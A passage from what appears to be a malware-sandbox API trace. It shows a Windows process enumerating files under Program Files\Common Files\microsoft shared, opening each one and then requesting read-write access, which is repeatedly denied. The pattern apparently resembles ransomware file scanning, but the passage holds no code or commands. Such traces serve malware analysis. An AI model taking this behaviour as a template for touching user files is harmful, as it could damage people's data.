Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.448] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0098.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0098.448] AreFileApisANSI () returned 1 [0098.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0098.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85260 [0098.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x85260, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vcruntime140.dll") returned 75 [0098.448] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vcruntime140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vcruntime140.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.448] GetFileType (hFile=0x418) returned 0x1 [0098.448] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85260 | out: hHeap=0x20000) returned 1 [0098.448] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0098.449] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0098.449] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0098.449] CloseHandle (hObject=0x418) returned 1 [0098.449] AreFileApisANSI () returned 1 [0098.449] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0098.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85300 [0098.449] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x85300, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vcruntime140.dll") returned 75 [0098.449] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vcruntime140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vcruntime140.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.449] GetLastError () returned 0x20 [0098.449] GetLastError () returned 0x20 [0098.449] SetLastError (dwErrCode=0x20) [0098.449] GetLastError () returned 0x20 [0098.449] SetLastError (dwErrCode=0x20) [0098.450] GetLastError () returned 0x20 [0098.450] SetLastError (dwErrCode=0x20) [0098.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85300 | out: hHeap=0x20000) returned 1 [0098.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0098.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0098.450] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.450] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.450] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x94, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8c7a8, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x94, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧媰\x01⺊Ā")) returned 0 [0098.450] FindClose (in: hFindFile=0x78490 | out: hFindFile=0x78490) returned 1 [0098.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0098.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0098.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0098.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0098.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4b5a8 | out: hHeap=0x20000) returned 1 [0098.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0098.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0098.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0098.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x467b8 | out: hHeap=0x20000) returned 1 [0098.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0098.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0098.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0098.451] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0098.451] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0098.451] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.451] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0098.451] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0098.451] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a238 [0098.451] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0098.451] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0098.451] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0098.451] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.451] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.451] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.451] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.451] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0098.451] AreFileApisANSI () returned 1 [0098.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink", lpUsedDefaultChar=0x0) returned 51 [0098.451] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0098.451] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.451] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.451] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0098.451] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0098.451] AreFileApisANSI () returned 1 [0098.451] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0098.451] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x464a8 [0098.451] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x464a8, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink") returned 51 [0098.451] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink" (normalized: "c:\\program files\\common files\\microsoft shared\\ink"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.451] GetLastError () returned 0x5 [0098.452] GetLastError () returned 0x5 [0098.452] SetLastError (dwErrCode=0x5) [0098.452] GetLastError () returned 0x5 [0098.452] SetLastError (dwErrCode=0x5) [0098.452] GetLastError () returned 0x5 [0098.452] SetLastError (dwErrCode=0x5) [0098.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x464a8 | out: hHeap=0x20000) returned 1 [0098.452] AreFileApisANSI () returned 1 [0098.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0098.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46ba8 [0098.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x46ba8, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink") returned 51 [0098.452] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink" (normalized: "c:\\program files\\common files\\microsoft shared\\ink"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.452] GetLastError () returned 0x5 [0098.452] GetLastError () returned 0x5 [0098.452] SetLastError (dwErrCode=0x5) [0098.453] GetLastError () returned 0x5 [0098.453] SetLastError (dwErrCode=0x5) [0098.453] GetLastError () returned 0x5 [0098.453] SetLastError (dwErrCode=0x5) [0098.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ba8 | out: hHeap=0x20000) returned 1 [0098.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0098.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0098.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0098.544] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.545] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.545] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.545] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0098.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a400 [0098.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0098.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0098.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0098.545] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa098a4c6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x71143a45, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="MSInfo", cAlternateFileName="")) returned 1 [0098.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0098.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0098.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0098.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0098.545] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x780d0 [0098.545] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb3e1c92c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb3e1c92c, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0098.545] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d100bae, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe462e472, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe462e472, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xc137d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Alphabet.xml", cAlternateFileName="")) returned 1 [0098.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0098.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0098.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0098.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0098.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0098.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x462e8 [0098.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0098.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0098.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0098.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0098.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0098.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0098.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0098.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0098.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0098.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0098.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0098.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0098.546] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.546] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.546] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.546] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0098.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.546] AreFileApisANSI () returned 1 [0098.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml", lpUsedDefaultChar=0x0) returned 64 [0098.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0098.546] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.546] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0098.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0098.547] AreFileApisANSI () returned 1 [0098.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0098.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0098.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6ea48, cchWideChar=64 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 64 [0098.547] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.547] GetFileType (hFile=0x418) returned 0x1 [0098.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0098.547] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0098.547] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0098.548] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0098.548] CloseHandle (hObject=0x418) returned 1 [0098.548] AreFileApisANSI () returned 1 [0098.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0098.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0098.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6de98, cchWideChar=64 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 64 [0098.548] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.548] GetLastError () returned 0x5 [0098.548] GetLastError () returned 0x5 [0098.548] SetLastError (dwErrCode=0x5) [0098.549] GetLastError () returned 0x5 [0098.549] SetLastError (dwErrCode=0x5) [0098.549] GetLastError () returned 0x5 [0098.549] SetLastError (dwErrCode=0x5) [0098.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0098.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0098.549] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.549] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.549] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05532b6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ar-SA", cAlternateFileName="")) returned 1 [0098.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0098.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0098.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0098.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0098.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0098.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0098.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0098.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0098.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0098.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0098.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e470 [0098.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0098.549] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.549] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.549] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.549] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, 